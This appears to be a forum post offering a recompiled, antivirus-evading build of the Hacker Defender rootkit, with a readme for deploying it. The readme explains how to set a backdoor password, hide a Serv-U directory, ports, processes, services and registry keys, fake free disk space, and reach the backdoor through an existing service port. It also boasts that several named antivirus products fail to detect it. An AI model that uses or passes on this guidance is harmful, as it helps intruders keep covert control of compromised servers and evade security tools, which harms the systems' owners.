This topic is locked
/////////////////////////////////////////////////////////////////////////////////// //isplog: Recompiled version of the Hacker Defender Rootkit // /////////////////////////////////////////////////////////////////////////////////// // // // Contents: isplog.exe > main executable // // isplog.ini > ini with settings // // install.cmd > install file for easy install // // client.exe > client to connect to the backdoor // // // // // // For more info about the use of the program, // // visit : http://rootkit.host.sk // // Credits go to hf who made this amazing piece of software // // // // // // To get started: // // // // Open the ini file and change the password of the backdoor // // // // You might want to change some_dir to the homedir of your servu // // Make sure this is a unique name and NO PATH // // If you take for example as name uniquedir, everything with that // // name will be hidden. // // // // In the ports section you can fill in the ports you want to be // // hidden. // // // // The root processes-section contains the processes that will see also // // the hidden stuff. change servu.exe to name of your servu executable // // If your servu service isn't serv-u than also change the hidden // // services section and the hidden regkeys section. // // // // In the free space section you can mention HD's and the space you want to // // to be faked, for example // // // // [Free Space] // // c:1048576 // // // // This will add 1048576 bytes(=1 MB) to the c drive as free space. // // // // With client.exe you can connect to your backdoor // // eg: client ip port password // // Port you should use is a port of an existing service. Most of the time // // port 80 will be fine // // // // // // I did not UPX or compress any file cause some AV etc will detect that // // and might give a warning. I tested these files with NAV2004 , McAfee, // // Panda and Kaspersky AV. Nothing got detected! // // // // // ///////////////////////////////////////////////////////////////////////////////////
Have fun with it
Plz some respect, took me some time to change everything
EDIT/UPDATE
Perhaps read : http://www.governmen...t=60#entry61511 before replying
